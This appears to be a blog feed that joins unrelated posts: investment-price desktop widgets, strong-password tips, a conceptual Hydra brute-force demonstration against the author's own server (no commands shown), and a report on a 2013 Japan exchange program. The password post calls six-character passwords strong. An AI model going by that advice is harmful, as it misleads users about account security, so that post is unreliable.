Watchlist and Portfolio

If you bought gold, silver, bitcoin, cryptocurrencies, commodities, stocks, bonds, mutual funds, forex, and treasuries, then you are probably familiar with the investment world. The hope of investment is the hope of the value of what we invests in increases. Let's face it, no matter how much we want the United States (US) Dollar to fall, it is still the most popular currency today and widely used for measuring values. Almost everything we know is priced in US dollars (USD). How much dollars does a meal worth? Something like that. You can price things in gold or bitcoin but most people may not understand, but if you do you are one of the unique legends that I respect. For example, how much grams of gold does a meal worth or how much satoshis?

Whatever your measurements, you are free to do but for now I will be using USD. The hope of investing is the hope of the USD value in what we invest in goes up. Read the following statement: (1) you bought bitcoin at $5000, (2) the price goes to $6000, that's good, (3) the price goes to $4000, that's bad. You should now have an idea why most investors often have a great urge to look at the price charts. Maybe you are already one of them. Which is why most investors have watchlist and some goes into more detailed as having a portfolio.

Watchlist

Thanks to the advancement of information and communication technology (ICT), watchlist can be in real-time, updated every seconds. For example, you can go to https://coinmarketcap.com or https://www.coingecko.com to see prices of cryptocurrencies, or go to https://www.cnbc.com or https://www.bloomberg.com to see other types of investments, or you can borrow widgets from these sites and embed them into your own website. You can always create your own though.

Portfolio

Some investors wrote portfolios. Portfolios in my opinion are essential when you make large and diversify investment. A portfolio keeps track ups and downs value of your investments. Usually measured in one type of value and most popular is USD. In my portfolio, you can see how much USD I gain or loss in each investments. For cryptocurrencies, I use Cryptocompare. For gold and others, I tried using Investing.com, and Teletrader.

Watchlist Desktop Widgets

You and other investors may find yourselves having frequent urges to see the price. Sometimes the urges can be too frequent. You feel bad or tired for repeatedly opening your apps to see the price, or an even longer process of opening a browser then go to a website to see the price. It happened to me, and I felt like I wasted a lot of time and energy doing so. Because of that, I decide to utilize dekstop widgets instead. I usually hate messy desktops and kept mine very clean, but now I know why those high frequency traders have multiple screens with many price indicator widgets.

Android

Smartphone is the most frequent computer device that I use. So good thing there are many desktop widgets that are developed. Maybe because everyone use smartphone more often than personal computers (PC)s now that these desktop widgets are more developed here. Below are the steps pinning a desktop widget on an Android smartphone:

1. Download a finance application that provides widgets. Honestly, I'm too lazy to check, so I just download apps randomly and if they don't have a widget or I don't like it, I uninstall. The finance desktop widgets that I used on my smartphone now are Teletrader, Investing.com, XE Currency, and TabTrader.
2. At you home screen, zoom out, add another screen if you have to, then click the widget button.
3. Find the widget that you want, touch and drag it out.
4. From here, the instruction varies to apps, so just follow the given instruction.

Windows

Windows is probably still the most used PC operating system (OS) in the world whether legal or illegal ones. There are different methods for pinning a desktop widget on Windows but below is my way:

1. I used Rainmeter software so get it at https://www.rainmeter.net and install.
2. I used this skin https://visualskins.com/skin/market-prices so download it or browse the website if you want to use other skins. Install it or manually extract and put it in Documents/Rainmeter/Skins directory.
3. Open the Rainmeter software, go to the skins directory, and load the .ini if haven't already done so.
4. Right click the widget and you can edit the configuration, too bad it looks complicated for now, so just follow the instructions to modify symbols.
5. Refresh on every edit.

Linux

There are many fans of Linux because it is open source. Windows and MacOS can be expensive, if you don't have money, this operating system is a great recommendation to get used to. Personally, I find it the easiest to deploy programs and servers on Linux. Unfortunately, I cannot find much dekstop widgets, I should either just run a program on startup or write one myself but temporarily I'm using gnome shell extensions and below are the steps:

1. Go to https://extensions.gnome.org and install the browser extension if you have not.
2. I use bitcoin markets, once you found the widget to your liking, install.
3. Click the gear button on the browser or open tweak to configure or right click on the widget.
4. From here, the instruction varies to widgets, so just follow the given instruction.

Huawei Tablet

Additionally, I also tried teletrader on my Huawei Tablet.

Mirror

• https://www.publish0x.com/0fajarpurnama0/investment-watchlist-desktop-widget-xgerqd?a=4oeEw0Yb0B&tid=weebly
• https://0fajarpurnama0.github.io/cryptocurrency/2020/04/06/investment-watchlist-desktop-widget
• https://medium.com/@0fajarpurnama0/investment-watchlist-desktop-widget-81479c9d251b
• https://hicc.cs.kumamoto-u.ac.jp/~fajar/cryptocurrency/investment-watchlist-desktop-widget.html
• https://0fajarpurnama0.tumblr.com/post/614830561608056832/investment-watchlist-desktop-widget
• https://0darkking0.blogspot.com/2020/04/investment-watchlist-desktop-widget.html
• https://hive.blog/investment/@fajar.purnama/investment-watchlist-desktop-widget?r=fajar.purnama
• https://0fajarpurnama0.cloudaccess.host/index.php/uncategorised/29-investment-watchlist-desktop-widget
• https://steemit.com/investment/@fajar.purnama/investment-watchlist-desktop-widget?r=fajar.purnama
• http://0fajarpurnama0.weebly.com/blog/investment-watchlist-desktop-widget
• https://0fajarpurnama0.wixsite.com/0fajarpurnama0/post/investment-watchlist-desktop-widget
• http://www.teiii.cn/investment-watchlist-desktop-widget

What desktop widgets are you using? Do you know anymore? Please leave a comment.

Star source code

Why a strong password is needed?

Simple answer: to prevent being hack (easy password can be hack using bruteforce method). For example http://0fajarpurnama0.weebly.com/blog/simple-password-bruteforce-demonstration-using-hydra.

Elaborated answer: to prevent unintended access to your accounts because:

• The can lock you out from your own account.
• Impersonate you like in social media to destroy your reputation.
• Steal confidential information or at least your privacy.
• Steal your funds if you have some sort of electronic money.
• In summary, lose everything electronically and maybe even worse as time passes.

In my opinion a strong password:

1. Contains small letters (a,b,c,d...).
2. Contains capital letters (A,B,C,D...).
3. Contains numbers (1,2,3,4...).
4. Contains symbol ($,<,>,?,+,+...).

For additional super strong password:

• More than 6 characters.
• Symbols not on keyboard (ALT+1265=±).
• Words not in dictionary.
• Starts with symbols.
• End with symbols.

Password Example

Example of strong password: My8.oP.

Example of super strong password: ╥F0r.m3-w4T1ng<f0R>YoU╝

Disclaimer

Although you have a strong password, it does not protect you from social engineering. For example, clicking on a suspicious link, opening a suspicious attachment, running a suspicious programming, entering your password on a fake login page because you didn't double check the link, etc. This is because you are giving your password to them, in other words, they don't need to guess.

Mirror

• https://www.publish0x.com/0fajarpurnama0/creating-strong-passwords-xzmpdd?a=4oeEw0Yb0B&tid=weebly
• https://0fajarpurnama0.github.io/internet/2020/04/05/creating-strong-password
• https://medium.com/@0fajarpurnama0/creating-strong-passwords-f95f8cf62846
• https://hicc.cs.kumamoto-u.ac.jp/~fajar/internet/creating-strong-password
• https://0fajarpurnama0.tumblr.com/post/614537946118455296/why-a-strong-password-is-needed
• https://0darkking0.blogspot.com/2020/04/creating-strong-passwords.html
• https://hive.blog/password/@fajar.purnama/creating-strong-passwords?r=fajar.purnama
• https://0fajarpurnama0.cloudaccess.host/index.php/uncategorised/26-creating-strong-passwords
• https://steemit.com/password/@fajar.purnama/creating-strong-passwords?r=fajar.purnama
• http://0fajarpurnama0.weebly.com/blog/creating-strong-passwords
• https://0fajarpurnama0.wixsite.com/0fajarpurnama0/post/creating-strong-passwords
• http://www.teiii.cn/creating-strong-passwords

show status: all queued started finished source code

Background

Have you ever forgotten your pin for your baggage then search on Youtube? Generally they advice "set everything to 000, try to click the lock, turn to 001, try to click the lock again, keep doing this until 009, then try 010, try to click the lock, turn to 011, try to click the lock again, keep doing this until 019, then try 020, repeat and eventually you will open the lock". Wait a minute isn't the same as trying every combination from 000-999? That is just brute force! What a spin around just to get views!

Story aside, in this article I will introduce you to a simple demonstration of brute forcing a password using Hydra on Linux. This is no advance tutorial but only to give people who never heard of brute force illustration. I can define password brute forcing in just one sentence which is trying every single character combination to crack a password.

Program Concept

As a human is a heavy labor, which is why we create programs to do them for us. The application or programming concept is actually simple.

1. Generate a dictionary of possible combinations.
2. Inject those combinations in account login interfaces.

The previous two steps are the basics and enough to run as an application. The next steps are the complicated ones because system nowadays became smarter in detecting and handling brute force. For example, you have limited tries and the account will be lock for certain duration or even permanent or you can be blacklisted. Like the cat and mouse game, the brute force application must be adapted every time to the existing defense system. As I wrote that this article is simple demonstration only, so I will not dive into these complicated and adaptive parts.

Hydra Demonstration

It was a long time ago before 2015 that I was interested in penetration testing tools and operating systems. Back then I was using Backtrack, now it is Kali Linux, then there is Parrot OS. Back then I wrote an article about brute force demonstration using Hydra tool which was eventually lost. Now, I found the screenshot backups and decided to rewrote again. The demonstration is brute forcing my own test server where I activated telnet service for login. The brute force is on both username and password.

Beyond this is at your own risk if targeting other's server because it will be count as a hacking attempt. Get permission for penetration testing or do only on your own servers.

Final Notes

If you follow the process completely you will realize how resource consuming it is to perform a brute force. Which is why among all exploitation method, brute force is the last resort. A dictionary can size to over many gigabytes and to try all of the combinations, you need a fast network and computing power. Lastly, now you now that accounts can be brute forced, it is important to have a strong password.

Mirror

• https://www.publish0x.com/0fajarpurnama0/simple-password-bruteforce-demonstration-using-hydra-xewooy?a=4oeEw0Yb0B&tid=weebly
• https://0fajarpurnama0.github.io/pentest/2020/04/04/simple-bruteforce-demo-hydra
• https://medium.com/@0fajarpurnama0/simple-password-bruteforce-demonstration-using-hydra-884dc8448686
• https://hicc.cs.kumamoto-u.ac.jp/~fajar/pentest/simple-bruteforce-demo-hydra.html
• https://0fajarpurnama0.tumblr.com/post/614452811196940288/simple-password-bruteforce-demonstration-using
• https://0darkking0.blogspot.com/2020/04/simple-password-bruteforce-demonstration-using-hydra.html
• https://hive.blog/pentest/@fajar.purnama/simple-password-bruteforce-demonstration-using-hydra?r=fajar.purnama
• https://0fajarpurnama0.cloudaccess.host/index.php/uncategorised/24-simple-password-bruteforce-demonstration-using-hydra
• https://steemit.com/pentest/@fajar.purnama/simple-password-bruteforce-demonstration-using-hydra?r=fajar.purnama
• http://0fajarpurnama0.weebly.com/blog/simple-password-bruteforce-demonstration-using-hydra
• https://0fajarpurnama0.wixsite.com/0fajarpurnama0/post/simple-password-bruteforce-demonstration-using-hydra
• http://www.teiii.cn/simple-password-bruteforce-demonstration-using-hydra

Name: Fajar Purnama

Country: Indonesia

Occupation: Undergraduate Student

ID: 21DNM03030

Batch: 3

Group: J (Fukuoka)

DEPARTMENT OF ELECTRICAL ENGINEERING FACULTY OF ENGINEERING UDAYANA UNIVERSITY

Preface

I would like to express my gratitude to JICE (Japan International Cooperation Center), Consulate General of Japan, Udayana University and Prof. Dr. IGP Wirawan, MSc. for allowing me to participate in this program. I would like to thank my mother and father for supporting me in this program. I thank you to all that I cannot mention one by one for helping me in this program.

This will be report for the program JENESYS 2.0 that I participated. Overall it will be what I experienced and what I will contribute of this program. I would like to apologize if there are mistakes and missing things in this report.

Sincerely

Fajar Purnama

Abstract

JENESYS 2.0 is the second program of Japan East Asia Network of Exchange for Students and Youths where the participants are from 10 countries in ASEAN. The program that I followed was 3rd Batch. The participants are divided from Group A – L with each group consist of 30 participants with variety of 3 people from each 10 ASEAN countries. I belong to J group and have my program in Fukouka where other groups went to other places throughout Japan. The participants are also divided into 3 categories which are “Arts, Creative Works & Culture”, “Economics & Social Sciences”, and my category “Science & Technology”.

This program was conducted by JICE (Japan International Coorperation Center). It is to prepare for the Integration in 2015 with the three pillars; ASEAN Politico-Security Community, ASEAN Economic Community, and ASEAN Socio-Cultural Community (JICE, 2013).

I found in Japan that the city is well organized where business, residential, government, are centralized and seperated from each other. Everywhere in Japan I find the place free of rubbish. Their recycling management is great as well. In Oki Town the wastes are divided in 25 variety and 97% of the wastes are recycled. I also that the Japanese people I met are welcoming. There are different cultures in each area. I also found the people are very discipline and strict with time, in other words punctual. The services in every shop I've been are extraordinary. The clerks always smile, always greet every person that arrive and leave the shop. As expected Japan is high tech. The technology I saw in Toyota Motor Kyushu is very high. They're also working on green energy now days to reduce pollution generated by plants, and they're aiming for zero pollution.

What I will do after this program is promoting Japan and ASEAN through ICT (Information Communication Technology). First I will promote websites of ASEAN and Japan here in Indonesia. Second I will establish links with my friends here in Indonesia to friends that I made from ASEAN and Japan on this program through free Medias and social Medias such as Yahoo Messenger, Facebook, Twitter, and final phase Skype or other video calling service. Third I will also upload this report to my blog https://0fajarpurnama0.github.io/bachelor as way of sharing my experience in Japan of this program.

So through this I hope integration between ASEAN, and ASEAN to Japan can be established. The flow of investment will be accelerated. If this is relized our relation in daily lifes will be expanded, wisdom will be expanded. In the end I hope we can interract with ASEAN countries and Japan like interracting with our neighbours daily.

Table of Content

• Cover
• Preface
• Abstract
• Table of Figures
• Table of Tables
• Chapter 1 Introduction
• Chapter 2 About JENESYS 2.0
• Chapter 3 Findings in Japan
  • Environment and City Management
  • Culture and People
  • Technology
• Chapter 4 Contributions and Future Plans of This Program
  • Mission of This Program
  • Currently Possible Applications
  • Ideas Not Currently Applicable
  • Future Benefits of These Plans
• Chapter 5 Conclusion
• Reference

Table Of Figures

• Figure 3.1 Image taken at Tokyo
• Figure 3.2 Image taken somewhere at Fukuoka
• Figure 3.3 Image taken somewhere at Fukuoka near Kururun
• Figure 3.4 Image taken somewhere at Fukuoka where no rubbish was sighted
• Figure 3.5 Waste division at Oki Town
• Figure 3.6 Some recycled products at Oki Town
• Figure 3.7 Some agricultural products in Fukuoka
• Figure 3.8 People coming out of subway station and train arrived on time
• Figure 3.9 Experiencing Noh Play at Ohari
• Figure 3.10 Photo with Tanaguchi family
• Figure 3.11 Automatic Toilet Seat
• Figure 3.12 AR demo on pamphlet and condominium
• Figure 3.13 Virtual fashion demonstration
• Figure 3.14 Kinect on mechanical of car engine acceleration
• Figure 3.15 Image taken on lecture by Fukuoka Prefectural Government
• Figure 3.16 Image taken of presentation video on Toyota Motor Kyushu
• Figure 3.17 Images taken at Laboratory of Spacecraft Environmental Interaction Engineering Kyutech
• Figure 4.1 Daily contact with my JENESYS 2.0 group friends through Facebook
• Figure 4.2 Putra Dananjaya (Indonesia) introduce himself to Daiki Takenaka (Japan)
• Figure 4.3 Ridho Yurham (Indonesia) introduce himself to Daiki Takenaka (Japan)
• Figure 4.4 Free medias I would use, Pidgin (multimessenger), Twitter, and Skype (video call service)
• Figure 4.5 http://blog.unud.ac.id/fajarpurnama/jenesys-2-0-report-fajar-purnama-bali-indonesia-group-j-fukuoka

Table Of Tables

• Table 4.1 List of websites to be promoted

Chapter 1 Introduction

JENESYS stands for Japan East Asia Network of Exchange for Students and Youths. So the program JENESYS 2.0 batch 3 was held in Japan. The participants are University students from ASEAN countries with each countriy sent approximately 40 participants. The purpose of this program is to establish strong relationship between ASEAN countries, and ASEAN to Japan for the upcoming AEC (ASEAN Economic Community) 2015.

There are 10 countries participating which were Brunei Darusalam, Cambodja, Indonesia, Laos, Malaysia, Myanmar, Philipin, Singapore, Thailand, and Vietnam. The participants were divided into 3 categories which are “Economics & Social Sciences”, “Arts, Creative Works & Culture”, and “Science & Technology”. All participants are divided into 12 groups with each group had 30 participants from 10 different countries, with 3 people from the same countries. Every group was dispersed throughout Japan. Group A & B went to Gifu, group C & D went to Mie, group E & F went to Kyoto, group G & H went to Nara, group I & J went to Fukuoka, group K went to Nagasaki, and group L went to Kumamoto. The program was from 23 June until 30 June, for a week.

I belong in J group, in category of science and technology. With I group we went to Fukuoka. On the first day I arrive at Narita International Airport. I spent the rest of this day at Hotel Nikko Narita. There I was given orientation of the program and met my other group members. On the second day we're in Tokyo and heard a lecture by ASEAN-Japan Center. On the third day we went to Fukuoka by airplane. We went to Ohori Park and experience Noh Play. On the fourth day we heard a lecture by NEXT Systems, Co., Ltd and Fukuoka Prefectural Government. On the fifth day we heard a lecture at Oki Town Sustainable Centre “Kururun”, visited Toyota Motor Kyushu, heard a lecture about agricultural produce in Asakura, and have a home visit with local residents in Asakura City. On the sixth day we visited Kyushu Institute of Technology to have a lecture about the Institute, have a discussion we local undergraduate students, and had a workshop there for presentaion for the next day. The seventh day we returned to Tokyo and went to Gardem City Chiba to presentate our action plan after this program. Finally we returned to our own country the next day.

The schedule for this group overall was mostly about knowing Japan and Fukuoka, and had an update of the latest technology. The most important thing on this program is the links that we have established among our friends from different countries and friends from Japan.

Chapter 2 About JENESYS 2.0

JENESYS stands for, Japan East Asia Region Network Exchange for Youths and Students, from this we can derive that this program will be held in Japan, the scale will be ASEAN and Japan, with purpose of network exchange, and targeted participants will be youths and students. The term 2.0 means it's the second program of JENESYS which means there was this program before.

This program was conducted by JICE (Japan International Coorperation Center). JICE was established in March, 1977. Its main activities include: the management of international training courses for trainees from developing countries; youth exchange programs; assistance for students from overseas; and dispatching international cooperation personnel. In addition to 220 members of permanent and temporary staff, 1080 specialists of 31 languages belong to JICE, playing important roles in their respective fields such as technical trainings, international exchange, and Japanese language lessons (JICE, 2013).

The objectives of this program are (JICE, 2013):

1. To raise awareness of the university students of ASEAN member countries towards ASEAN Integration and ASEAN Economic Integration and to let the young generations of Japan to deepen the understanding of ASEAN countries and AEC (ASEAN Economic Community).
2. To learn about the activities of Japan and the key success factors for the economic revitalization in each area and to utilize the ideas for the economic development of each ASEAN member country.
3. To establish the AEC Youth Network to be given the function as a hub linking the young generation of the ASEAN member states and Japan for the future cooperation of the mutual benefit. For that purpose, the active dialogue of the mission members of the youth from the ASEAN countries and the youth of Japan is enhanced.
4. ASEAN (Association of Southeast Asia Nations) are setting for the Integration in 2015 with the three pillars; ASEAN Politico-Security Community, ASEAN Economic Community, and ASEAN Socio-Cultural Community.

Chapter 3 Findings In Japan

3.1 Environment and City Management

I found the city's management well organized. I've seen the business district has its own block.

I've also seen the residential district and farms seperated.

Overall the towns are clean.

On 27th June 2013 from 09:30 – 11:00, we visited a recycling based town development Oki Town (Oki Town sustainable centre “Kururun”) and have a lecture of waste management there. Here the wastes are divided into 25 varieties.

Today at this town 97% of its waste are recycled which means there is only 3% rubbish and the rest can be use for something beneficial. For example fertilizer, electricity from biogas, diesel from kitchen waste. It's also thanks to local town's folk support to relize this. In the future they're aiming for zero waste town.

I found that Fukuoka is also rich in agriculture. On 27th June 2013 from 16:00 – 17:00 we have lecture of agriculture at Asakura City. They're currently focusing on creating healthy and tasty snacks made from fruits and vegetables. Their reasons for this it's because youths today eats more snacks (like chips) and less fruit. So they like to create healthy chips made from fruits and vegetables.

3.2 Culture and People

My first impression of the people when coming to Japan was they're strict with time. There's no tolerance of the word late in Japan. Everything is punctual. What I examine of how they can be punctual, it's because of subway train. Logically a subway train is clear channel transportation. Therefore the time of a subway train arrives is predictable and accurate.

Even though they advance their technology but they still preserve their culture. On 25th June 2013 from 14:30 – 16:30 we went to Ohari Park to experience Noh Play ourselves. This play was founded around 700 years ago on the age of the Samurai. I asked whether the audience needed to understand Japanese in order to enjoy this play. The answered, it's played in classical Japanese even native Japanese people find it hard to understand. Even though there is lack in understanding this play can still be enjoyed just witnessing the performance and costumes, similar to watching Operah.

From overall the Japanese people I have met, they're open, they really want to know of other peoples background and culture. The service that I witness there is very surprising. Every store I went to provides excellent customer service. The store clerks will always smile and says “irasshaimase” which is for welcoming someone whenever someone came. Most of the clerks have bright face when facing their clients. Other than that they also greet like “Ohaiyougozaimasu” which is Good morning. In the end they always thank their customer “arigatougozaimasu” which means thank you. Back to environment management, the people always keep their environment clean and tidy. They always throw their rubbish on the bin and arrange their surroundings well.

On 27th June 2013 from 17:00 – 21:00 I have a home visit to Tanaguchi family. The entire family provides excellent hospitality even though we have trouble communicating because I could only speak Japanese a little. They're open people and likes to know how things are in my country.

3.3 Technology

My first impression of the technology in Japan was advance. My group J is a science and technology group. Most of our programs are explorations of technologies in Japan. There are two that had been mention above which are subway train and recycling factory in Oki Town. The everyday technology I experienced was automatic toilet seat.

The first program of technologies was on 26th June 2013 by NEXT Systems, Co., Ltd which was about stories behind its research and development, motion control system (Kinect in medical field, etc.) hands-on experience of Augmented Reality System, Kinect in fashion try-on, and Head Mount 3D Display. After that was demo of the technology. The first demo was AR of pamphlet and condominium. This technology works on android system by installing the application then connecting to the AR's network. Here I asked whether it needs its own connection or not. They answered they provided their on connection or it can be connected to the Internet. I also asked whether the current network capacity (most people called it bandwidth) is enough for today and future if all citizens are using this technology. They replied that technology is growing, today's current technology is enough but it's still growing, so it will be alright in the future. On my experience the android reads the 2D image then converts it to 3D or more detailed images. The second demo was virtual fashion demonstration where the person stands in front of the mirror and select virtual clothes to try on. The ideal technology is the same as trying clothes in changing room but virtually. So instead of wasting much energy on trying clothes in changing room, it's more energy efficient to use this virtual fashion mirror. This is also based on Kinect. The third demo was Kinect on mechanical of acceleration of cars. Kinect is an input device without any controller. Gestures lead to intuitive control. The picture is in 3D, the ideal technology is examining an object by touching except here is virtual.

The second program of technologies was lectures of hydrogen energy project, organic photonics and electronics R&D base, and ruby contents related policy measures also promoting of digital contents industry utilizing programming language ruby by Fukuoka Prefectural Government.

About the lecture of Hydrogen Energy is basically a fuel cell that generates electricity through the chemical reaction in which hydrogen and oxygen react to produce water and electricity. They said the energy produce is comparable to other electrical generator. The greatest advantage of this Hydrogen strategy is CO2 free. It doesn't produce CO2, so their future plan is CO2 free electrical power plants replacing those that generate high pollution. The next one was about organic EL display which EL stands for electroluminescence. Its main purpose is energy efficiency, since the material itself emits light so it saves the effort of emitting light, so it uses less energy. I asked on this session of how it compares to LCD. They have surprising answers which first of course it's much more efficient, second it's same cost to LCD, third it has same lifespan, and finally a shocking answer it has better performance than LCD (usually those with higher efficiency has lower performance). The next lecture it's about Ruby and digital industry content. Since time is limited they only introduce, and said they're recruiting undergraduates every year.

The third program was about Oki Town Sustainable Centre “Kururun”, Recycling based town development which had already been explained in section 3.2.

The fourth program was a company visit to Toyota Motor Kyushu.

To be honest it was too much for me to comprehend and we're forbid to take photos, but what I captured was they work with excellent system. We took tour on a real field of how cars are produced from zero until made. Their workers are humans and robots. What I saw, parts were carried by robots, and some simpler assembling was also done by robots. Other jobs and complicated assembling were done by humans. Their work was very systematic. Each phase of assembling are done by different people, with each phase has its time limit. If a worker encounters problems which cannot be solved within the time limit, the worker rings the bell and the flow will be stopped and others will come to help. After each phase of assembling there's an inspection and all data are recorded.

The fourth program was about Agricultural produce in Asakura Technological development of Agri-Processing, already written on section 3.2.

The last program regarding on technology was a visit to Kyutech (Kyushu Institute of Technology). We were divided into 2 groups 1 to go the Mechanical Engineering Laboratory. I chose to go to Laboratory of Spacecraft Environmental Interaction Engineering. I captured that on that laboratory they research on Spacecraft Environmental Interaction through artificial Space they created in tubes. In those tubes are artificial Space base on real Space. They conduct many kinds of experiments there.

Chapter 4 Contributions And Future Plans Of This Program

4.1 Mission of This Program

During the program there were few lectures that explained to us the mission of this program. First was program orientation on 23rd June 2013 from 14:00 – 17:00 at Hotel Nikko Narita. Second was lecture by ASEAN-Japan Center on 24th June 2013 from 10:00 – 11:30 at National Olympics Memorial Youth Center, Tokyo. Third was lecture by Fukuoka Prefectural Government of outline of Fukuoka Prefecture and exchange with ASEAN on 26th June 2013 from 14:00 – 17:00 at Fukuoka. Last one was workshop report presentation on 29th June 2013 from 16:00 – 17:00 at Symphonia E, 3F, TKP, Garden City Chiba (we did our workshop the day before).

Overall the programs metioned above I derived that the mission of this program is to prepare for ASEAN integration in 3 pillars (stated in chapter 1) on 2015 and Japan wants to join in. With each group’s participants are from 10 different countries of ASEAN, we are to establish links between ASEAN countries with the first step befriend with participants in our group. The program also told us to establish links between ASEAN and Japan. We are to carry on ASEAN – Japan Centre’s will which is to promote export from ASEAN to Japan, to accelerate the flow of investment between ASEAN and Japan including the transfer of skills and technology, and to vitalize tourist traffic between ASEAN and Japan.

4.2 Currently Possible Applications

I have befriended with all participants in my group, also with some others outside my group. Even up to today we’re still in contact almost daily through social media.

What I privately captured from this program is a mission to link my friends and everyone else in my home country to those links that I have established during this program.

Since my backgrounds are in Electrical Engineering and ICT (Information Communication Technology) I would like to do this task using methods base on my backgrounds. I’d like to promote and I have already started of ASEAN and Japan through websites to first my friends. Since I just started I have promoted these websites below to around 10 of my friends at my home country. I planned to promote them to everyone I know. For Facebook I’ll ask my friends to like, for Twitter to follow, and for web pages I’ll ask to bookmark.

Tabel 4.1 List of websites to be promoted

NO	Website	Description
1	https://www.facebook.com/youthexchange.mofa
2	https://www.facebook.com/jenesys2jpasean
3	https://www.facebook.com/ASEANCommunity
4	https://www.facebook.com/aseanbeatEnglish
5	https://www.twitter.com/@asianbeat_chan_en
6	http://asianbeat.com
7	http://buyasean.jp
8	http://www.kyutech.ac.jp
9	http://cent.ele.kyutech.ac.jp
10	http://cent.ele.kyutech.ac.jp/seic/seic_web.html
11	http://cent.ele.kyutech.ac.jp/index_e.php
12	http://laseine.ele.kyutech.ac.jp/english
13	http://www.toyota-kyushu.com
14	http://www.visitjapan.jp
15	http://www.jnto.go.jp
16	http://www.fosa.jp
17	http://www.fissc.net
18	http://www.crossroadfukuoka.jp
19	http://www.pref.fukuoka.lg.jp
20	http://www.youtube.com/user/FukuokaPrefecture
21	http://www.mofa.go.jp
22	http://web-japan.org
23	http://www.vjc.jp
24	http://www.denpasar.id.emb-japan.go.jp
25	http://www.kyushu-u.ac.jp/english/index.php	Kyushu University
26	http://www.kyutech.ac.jp/english/index.html	Kyushu Institute of Technology
27	http://www.fwu.ac.jp/english	Fukuoka Women's University
28	http://www.kitakyu-u.ac.jp/another_language_site.html	The University of Kiyakyushu
29	http://www.seinan-gu.ac.jp/eng	Seinan Gakuin University
30	http://www.fukuoka-u.ac.jp/english	Fukuoka University
31	http://www.ip.kyusan-u.ac.jp/E/index.html	Kyushu Sangyo University
32	http://www.fit.ac.jp/EN/index.html	Fukuoka Institute of Technology
33	http://www.kurume-u.ac.jp/english/index.html	Kurume University
34	http://www.kindai.ac.jp/english	Kinki University Fukuoka Campus
35	http://www.fukujo.ac.jp/university	Fukuoka Jo Gakuin University

As I stated above I have befriends with many people on this program from both ASEAN countries and Japan. It’d be better if I don’t keep it to myself so I’d like to introduce them to friends in Indonesia (ASEAN-Japanese friends to Indonesian friends). At least I should introduce but I’ll also ask them to introduce themselves and interract with the friends I met on this program (Indonesian friends to ASEAN-Japanese friends). I’d like to do this through ICT (Information Communication Technology). The beginning step is through social media such as Facebook and Twitter. I planned to show them the friends I made through this program. Then through posts I planned that they would introduce themeselves. The picture below shows that I never though my friends would be daring, it’s great though.

Next it would be nice that they could befriend at take the relationship to the next level throught chats. Finally, the last step I have in mind is they would interract daily through video conference, through Skype, facebook video call, yahoo messenger video call, etc. Today video call is the closest telecommunication to face-face conversation. That’s how far I could go as bridge between my friends in Indonesia and ASEAN-Japanese friends. I can only go as far as using free services because of economic limitation. Other than electricity, the hardware and software itself, and some paid internet services, accessing websites, social media, VOIP (Voice Over IP), and video calls are free.

I will also share my experience by uploading my report on my blog https://0fajarpurnama0.github.io/bachelor http://blog.unud.ac.id/fajarpurnama (obselete) and other things such as photos, although all the photos I have uploaded on Facebook. I will volunteerly link or upload informations base on this program. Experiences such as the NOH play that I experienced, vist of NEXT Systems, Co., Ltd, lectures of Hydrogen Strategy, lectures of EL, lectures of Ruby and Digital Industry, visit of Recycling Center in Oki Town “Kururun”, visit of Toyota Motor Kyushu, lecture of agriculture in Asakura, home visit with Tanaguchi Family, visit of Kyutech, and the mission of this program from overall lectures and programs

4.3 Ideas Not Currently Applicable

This section is ideas that today I cannot do which will remain for now as ideas. Still it’s some ideas that may prove beneficial but I alone for now could no accomplish due to limitation of economy and power.

My first idea is to establish a curriculum in education of establishing links between ASEAN countries and ASEAN to Japan. Why I stated this because just by providing facilities such as socialmedias and websites will not maximize the benefit of these facilities. There are lots of people who will not use these facilities unless these facilities are socialized, even more unless these people are told to. So I recommend that there will be a curriculum. There will be more socialization of establishing links between ASEAN countries and ASEAN to Japan, there will be lectures, and there will be task for students to access websites regarding to establishing links between ASEAN countries and ASEAN to Japan and making friends with people from outside home countries to socialmedias.

My second idea is to have more joint lectures between different regions and different countries via video conference, more seminars and more workshops through video conference. So I suggest there will be more video conferences between regions and countries.

My third idea is to promote more information regarding to ASEAN and Japan through local medias which are radio and television.

My fourth idea is to teach the young generations to be openminded. Openminded is the key for relationships between different people to succeed.

My fifth idea is an R&D (Research and Development) on face to face technologies, whether it’s an affordable technology that makes long range telecommunication has the same quality as face to face communication or build a global affordable transportation so people can travel to other countries daily (people can afford to go to different countries everyday).

4.4 Future Benefits of These Plans

If these plans are relized then maximum acceleration of economic, exchange, and tourism flow can be achieved. Daily relationship will widen greatly, we not only interract with among our people but we will interract with other people from different background everyday. Real international school will be relized. For example like my primary school in Australia called Daceyville Public School. Back then my friends are not only natives Australian, but I have friends from Korea, China, Phillipin, Iran, India, and many others from all over the world. If each School has students from Indonesia, Japan, Philipin, Malaysia, Brunei Darusalam, Vietnam, Thailand, Laos, Myanmar, and Cambodja then there will be no more challenge of integration. In other words we succeeded. Growth on prosperity will be accelerated. It will be an even more fun world to live in. Other nations will follow us and sees us as an example.

Chapter 5 Conclusion

I learned from this program that there will be integration of ASEAN and Japan in 2015. From this program we’re given a role to prepare for the integration. I already kept in touch with the friends I have made from ASEAN and Japan on this program through Facebook. I also have promoted the websites about ASEAN and Japan to some of my friends, and I have started to introduce my friends from ASEAN and Japan to my friends in Indonesia through Facebook. I will continue to establish links between my friends in Indonesia to my friends in ASEAN countries and Japan through Twitter, Pidgin Multimessenger for chatting, and finally Skype or through other video call services. Not to forget I will continue to promote and introduce this to more of my friends. I will share my experience through this report other than verbally. Once I finished writing this chapter I will upload it to my blog https://0fajarpurnama0.github.io/bachelor.

My summary experience in Japan is that Japan is high tech country. The people are very welcoming, discipline especially in the field of punctuality. The services I found there everywhere is very warm hearted. They would greet anyone that comes in the shop and leaving the shop and they will always smile. The city management is very well organized where business district, residential area, and government are seperated and centralized. The city is clean which is no garbage found anywhere.

Just one thing I find missed on this program is involving Japanese participants. There were participants from 10 different countries in ASEAN but there were no Japanese participants.

Reference

• JICE, 2013. Participants’ Handbook for ASEAN Economic Community (AEC) Youth Network. Japan International Coorperation Center : Japan
• Download this report: http://raboninco.com/22989623/jenesys203rdbatch

Mirror

• https://www.publish0x.com/0fajarpurnama0/jenesys-japan-east-asia-network-of-exchange-for-students-and-xlmzdz?a=4oeEw0Yb0B&tid=weebly
• https://0fajarpurnama0.github.io/misc/2020/04/02/jenesys203rdbatch
• https://medium.com/@0fajarpurnama0/jenesys-japan-east-asia-network-of-exchange-for-students-and-youths-2-0-report-ac54b1882584
